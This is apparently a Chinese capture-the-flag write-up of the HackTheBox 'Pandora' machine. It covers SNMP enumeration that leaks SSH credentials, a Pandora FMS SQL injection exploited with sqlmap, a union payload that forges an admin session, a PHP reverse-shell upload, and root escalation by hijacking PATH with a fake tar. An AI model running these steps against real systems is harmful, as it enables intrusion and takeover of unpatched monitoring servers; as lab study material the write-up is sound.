HackTheBox - Machines - Pandora.
目标地址:10.10.11.136 攻击机地址:10.10.14.24
1.信息搜集
首先Nmap扫描端口,扫描靶机的地址,得知 22(SSH)、80(Web)端口开放,那么先到web页面看看有没有什么信息或可利用点
命令:nmap -sS -sV -sC -T4 10.10.11.136 Nmap scan report for 10.10.11.136 Host is up (0.31s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Play | Landing |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds
这里我之前做的时候是直接解析成pandora.htb的,因历史解析的原因,这次做的时候直接访问到了。
第一次做pandora的时候,将域名解析地址写入hosts文件中即可。
访问到了web页面,没有发现什么有用的信息,扫描一下目录看看
目录也没有可用的信息,既然是靶场那么一定有突破点的。
用nmap再扫一下udp端口
这里可以看到snmp-netstat有我自己的ip地址,是因为在扫udp端口的时候我已经和靶机的snmp建立好了连接
命令:nmap -sS -sU -sC -sV -O -T4 10.10.11.136 Nmap scan report for 10.10.11.136 Host is up (0.32s latency). Not shown: 998 closed tcp ports (reset), 994 closed udp ports (port-unreach) Bug in snmp-win32-software: no string output. PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Play | Landing 22/udp open|filtered ssh 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-processes: | 1: | 2: | 3: | 4: | 6: | 9: | 10: | 11: | 12: | 13: | 14: | 15: | 16: | 17: | 18: | 20: | 21: | 22: | 23: | 24: | 25: | 26: | 27: | 28: | 29: | 30: | 77: | 78: | 79: | 80: | 81: | 82: | 83: | 84: | 85: |_ 88: | snmp-interfaces: | lo | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 10 Mbps | Traffic stats: 14.25 Mb sent, 14.25 Mb received | VMware VMXNET3 Ethernet Controller | IP address: 10.10.11.136 Netmask: 255.255.254.0 | MAC address: 00:50:56:b9:c8:18 (VMware) | Type: ethernetCsmacd Speed: 4 Gbps |_ Traffic stats: 18.62 Mb sent, 16.92 Mb received | snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 |_ System uptime: 13h44m13.92s (4945392 timeticks) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 48fa95537765c36000000000 | snmpEngineBoots: 30 |_ snmpEngineTime: 13h44m14s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 10.10.11.136:22 10.10.14.24:1079 | TCP 10.10.11.136:22 10.10.14.24:1081 | TCP 10.10.11.136:48448 10.10.14.2:4321 | TCP 10.10.11.136:48756 10.10.14.2:4321 | TCP 10.10.11.136:54026 10.10.14.2:4321 | TCP 10.10.11.136:54808 1.1.1.1:53 | TCP 127.0.0.1:3306 0.0.0.0:0 | TCP 127.0.0.53:53 0.0.0.0:0 | UDP 0.0.0.0:161 *:* |_ UDP 127.0.0.53:53 *:* 1885/udp open|filtered vrtstrapserver 16970/udp open|filtered unknown 20872/udp open|filtered unknown 37813/udp open|filtered unknown No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=2/10%OT=22%CT=1%CU=2%PV=Y%DS=2%DC=I%G=Y%TM=6204DB45%P= OS:i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ OS:(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O OS:3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=FE88%W2= OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M508NNSN OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Host: pandora; OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1124.37 seconds
扫描结束后可以看到有一个snmp协议(简单网络管理协议)开在udp 161端口上。
可以尝试使用snmpwalk对其进行连接,snmpwalk可以在net-snmp官网去下载到
2.漏洞利用
连接命令:snmpwalk.exe -v 2c -c public 10.10.11.136
IOD列表:http://www.ttlsa.com/monitor/snmp-oid/
可以看到这里面有很多信息,包括主机名字、网络接口数、CPU使用情况等信息。
其中有一串OID对应的是这样的信息
看起来像是账号和密码,靶机开启了SSH的端口,使用该账号密码进行ssh连接测试
username:daniel,password:HotelBabylon23
C:\Users\kami>ssh daniel@10.10.11.136 daniel@10.10.11.136's password: Permission denied, please try again. daniel@10.10.11.136's password: Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu 10 Feb 09:47:53 UTC 2022 System load: 0.08 Usage of /: 63.1% of 4.87GB Memory usage: 9% Swap usage: 0% Processes: 256 Users logged in: 0 IPv4 address for eth0: 10.10.11.136 IPv6 address for eth0: dead:beef::250:56ff:feb9:c818 => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Feb 9 19:49:10 2022 from 10.10.14.2 daniel@pandora:~$ whoami daniel daniel@pandora:~$ id uid=1001(daniel) gid=1001(daniel) groups=1001(daniel) daniel@pandora:~$
3.提权进行时
可以看到还有一个matt账户,在该账户下存在着user.txt应该就是flag了,但是没有权限查看,接下来就想办法提权到matt账户。
尝试进行suid sudo 计划任务提权,发现好像都没法进行提权。
curl一下自己看看呢。
拼接到url访问看看是个什么东西,为了便于展示,这里我将host文件进行了修改,ip对应到了pandora.htb域名
显示没找到,但是我在本机使用curl pandora.htb的时候明明可以看到呀。
ssh隧道来一波
C:\Users\kami>ssh -L 80:127.0.0.1:80 daniel@10.10.11.136 daniel@10.10.11.136's password: Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu 10 Feb 10:04:59 UTC 2022 System load: 0.0 Usage of /: 63.1% of 4.87GB Memory usage: 15% Swap usage: 0% Processes: 249 Users logged in: 1 IPv4 address for eth0: 10.10.11.136 IPv6 address for eth0: dead:beef::250:56ff:feb9:c818 => /boot is using 91.8% of 219MB 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu Feb 10 09:47:54 2022 from 10.10.14.24
此时就代理成功了,浏览器直接访问127.0.0.1即可访问到靶机本地存在的web服务
页面标题就是 Pandora FMS 在页脚可以看到版本为v7.0NG.742_FIX_PERL2020
在https://cvedetails.com找到了对应的cve,存在着sql注入
可以看到在 pandora_console/include/chart_generator.php的session_id参数是注入点,那么直接丢进sqlmap跑一跑
跑出了库名,下一步表名,直到跑出session值。
+------------------------------------+ | taddress | | taddress_agent | | tagent_access | | tagent_custom_data | | tagent_custom_fields | | tagent_custom_fields_filter | | tagent_module_inventory | | tagent_module_log | | tagent_repository | | tagent_secondary_group | | tagente | | tagente_datos | | tagente_datos_inc | | tagente_datos_inventory | | tagente_datos_log4x | | tagente_datos_string | | tagente_estado | | tagente_modulo | | talert_actions | | talert_commands | | talert_snmp | | talert_snmp_action | | talert_special_days | | talert_template_module_actions | | talert_template_modules | | talert_templates | | tattachment | | tautoconfig | | tautoconfig_actions | | tautoconfig_rules | | tcategory | | tcluster | | tcluster_agent | | tcluster_item | | tcollection | | tconfig | | tconfig_os | | tcontainer | | tcontainer_item | | tcredential_store | | tdashboard | | tdatabase | | tdeployment_hosts | | tevent_alert | | tevent_alert_action | | tevent_custom_field | | tevent_extended | | tevent_filter | | tevent_response | | tevent_rule | | tevento | | textension_translate_string | | tfiles_repo | | tfiles_repo_group | | tgis_data_history | | tgis_data_status | | tgis_map | | tgis_map_connection | | tgis_map_has_tgis_map_con | | tgis_map_layer | | tgis_map_layer_groups | | tgis_map_layer_has_tagente | | tgraph | | tgraph_source | | tgraph_source_template | | tgraph_template | | tgroup_stat | | tgrupo | | tincidencia | | titem | | tlanguage | | tlayout | | tlayout_data | | tlayout_template | | tlayout_template_data | | tlink | | tlocal_component | | tlog_graph_models | | tmap | | tmensajes | | tmetaconsole_agent | | tmetaconsole_agent_secondary_group | | tmetaconsole_event | | tmetaconsole_event_history | | tmetaconsole_setup | | tmigration_module_queue | | tmigration_queue | | tmodule | | tmodule_group | | tmodule_inventory | | tmodule_relationship | | tmodule_synth | | tnetflow_filter | | tnetflow_report | | tnetflow_report_content | | tnetwork_component | | tnetwork_component_group | | tnetwork_map | | tnetwork_matrix | | tnetwork_profile | | tnetwork_profile_component | | tnetworkmap_ent_rel_nodes | | tnetworkmap_enterprise | | tnetworkmap_enterprise_nodes | | tnews | | tnota | | tnotification_group | | tnotification_source | | tnotification_source_group | | tnotification_source_group_user | | tnotification_source_user | | tnotification_user | | torigen | | tpassword_history | | tperfil | | tphase | | tplanned_downtime | | tplanned_downtime_agents | | tplanned_downtime_modules | | tplugin | | tpolicies | | tpolicy_agents | | tpolicy_alerts | | tpolicy_alerts_actions | | tpolicy_collections | | tpolicy_groups | | tpolicy_modules | | tpolicy_modules_inventory | | tpolicy_plugins | | tpolicy_queue | | tprofile_view | | tprovisioning | | tprovisioning_rules | | trecon_script | | trecon_task | | trel_item | | tremote_command | | tremote_command_target | | treport | | treport_content | | treport_content_item | | treport_content_item_temp | | treport_content_sla_com_temp | | treport_content_sla_combined | | treport_content_template | | treport_custom_sql | | treport_template | | treset_pass | | treset_pass_history | | tserver | | tserver_export | | tserver_export_data | | tservice | | tservice_element | | tsesion | | tsesion_extended | | tsessions_php | | tskin | | tsnmp_filter | | ttag | | ttag_module | | ttag_policy_module | | ttipo_modulo | | ttransaction | | ttrap | | ttrap_custom_values | | tupdate | | tupdate_journal | | tupdate_package | | tupdate_settings | | tuser_double_auth | | tuser_task | | tuser_task_scheduled | | tusuario | | tusuario_perfil | | tvisual_console_elements_cache | | twidget | | twidget_dashboard | +------------------------------------+ 一共178张表,但是和session相关的只有三张表。 测试后选择dump tsessions_php表
+ | id_session | data | last_active | + | 09 vao3q1dikuoi1vhcvhcjjbc6 | id_usuario| s:6 :"daniel"; | 1638783555 | | 0 ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 | | 1 um23if7s531kqf5da14kf5lvm | NULL | 1638792211 | | 226 i87if97nt5hlqp51e9n8rrk | id_usuario| s:4 :"matt";alert_msg| a:0 :{}new_chat| b:0 ; | 1644436354 | | 2e25 c62vc3odbppmg6pjbf9bum | NULL | 1638786129 | | 346 uqacafar8pipuppubqet7ut | id_usuario| s:6 :"daniel"; | 1638540332 | | 3 me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 | | 4 f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 | | 4 nsbidcmgfoh1gilpv8p5hpi2s | id_usuario| s:6 :"daniel"; | 1638535373 | | 59 qae699l0971h13qmbpqahlls | NULL | 1638787305 | | 5 fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 | | 5 i352tsdh7vlohth30ve4o0air | id_usuario| s:6 :"daniel"; | 1638281946 | | 69 gbnjrc2q42e8aqahb1l2s68n | id_usuario| s:6 :"daniel"; | 1641195617 | | 81 f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 | | 883 c23eu7d1ndarij0qtg3kd12 | id_usuario| s:5 :"admin";alert_msg| a:0 :{}new_chat| b:0 ; | 1644437290 | | 8 m2e6h8gmphj79r9pq497vpdre | id_usuario| s:6 :"daniel"; | 1638446321 | | 8 upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 | | 9 vv4godmdam3vsq8pu78b52em9 | id_usuario| s:6 :"daniel"; | 1638881787 | | a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 | | agfdiriggbt86ep71uvm1jbo3f | id_usuario| s:6 :"daniel"; | 1638881664 | | cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 | | cs89puvbasun981denejfp64r2 | id_usuario| s:6 :"daniel"; | 1644488590 | | d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 | | eng03tpqsi5243hajufjtmbdh3 | NULL | 1644488794 | | f0qisbrojp785v1dmm8cu1vkaj | id_usuario| s:6 :"daniel"; | 1641200284 | | fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 | | fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 | | g0kteepqaj1oep6u7msp0u38kv | id_usuario| s:6 :"daniel"; | 1638783230 | | g4e01qdgk36mfdh90hvcc54umq | id_usuario| s:4 :"matt";alert_msg| a:0 :{}new_chat| b:0 ; | 1638796349 | | gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 | | gnniv81mf01km3js0874s9ktd3 | NULL | 1644437818 | | heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 | | hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario| s:6 :"daniel"; | 1638168492 | | jecd4v8f6mlcgn4634ndfl74rd | id_usuario| s:6 :"daniel"; | 1638456173 | | kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 | | l33ouea0ibftaucjbdnv3spgfs | NULL | 1644488696 | | ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 | | ng1n291iilod73mebktb2vfu29 | id_usuario| s:6 :"daniel"; | 1644436001 | | o3kuq4m5t5mqv01iur63e1di58 | id_usuario| s:6 :"daniel"; | 1638540482 | | oi2r6rjq9v99qt8q9heu3nulon | id_usuario| s:6 :"daniel"; | 1637667827 | | pjp312be5p56vke9dnbqmnqeot | id_usuario| s:6 :"daniel"; | 1638168416 | | qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 | | r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 | | r6greufnpiikl6i06q7lcjgmnd | NULL | 1644448880 | | rgku3s5dj4mbr85tiefv53tdoa | id_usuario| s:6 :"daniel"; | 1638889082 | | u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario| s:6 :"daniel"; | 1638547193 | | u74bvn6gop4rl21ds325q80j0e | id_usuario| s:6 :"daniel"; | 1638793297 | | vdoohnc7hlr1fglc7gamjqljrk | NULL | 1644488427 | +
可以看到,有daniel和admin、matt的session记录在里面。
通过poc:http://127.0.0.1/pandora_console/include/chart_generator.php?session_id= ’ union SELECT 1,2,‘id_usuario|s:5:“admin”;’ as data – exp
然后再访问后台http://127.0.0.1/pandora_console/,即可成功进入后台。
但是我这里在做的时候有人也在做,将后台页面覆盖为了一个cmd马的页面,所以只能直接执行命令了。
用python3反弹一个shell过来
成功拿到flag.
4.提权到root
首先看一下拥有suid权限的文件,这里看到有个pandora_backup为二进制文件
运行是会报错的,先不管,先生成ssh密钥文件进行ssh登录
生成ssh密钥,直接登录matt用户
生成之后 本地创建一个id_rsa 同样权限700 将生成的密钥粘贴进去
ssh连接即可
ssh连接之后,开始恶意伪造文件
创建一个tar,将matt的home路径注入环境变量,然后运行pandora_backup文件
此次靶场对我来说确实比较难,以至于全网搜索找寻wp…
5.补充进入后台:
通过poc:http://127.0.0.1/pandora_console/include/chart_generator.php?session_id= ’ union SELECT 1,2,‘id_usuario|s:5:“admin”;’ as data – exp
然后再访问后台http://127.0.0.1/pandora_console/,即可成功进入后台。
然后在 admin tools中找到file manager
点击上传,这里上传一个反弹shell的php即可,然后直接访问即可反弹。
上传后文件地址在pandora_console/images/ 下面
本地nc监听,访问http://127.0.0.1/pandora_console/images/1.php
即可收到。
参考文章:
https://zhuanlan.zhihu.com/p/458926451
https://blog.peterjbrowning.com/2022/01/htb-writeup-pandora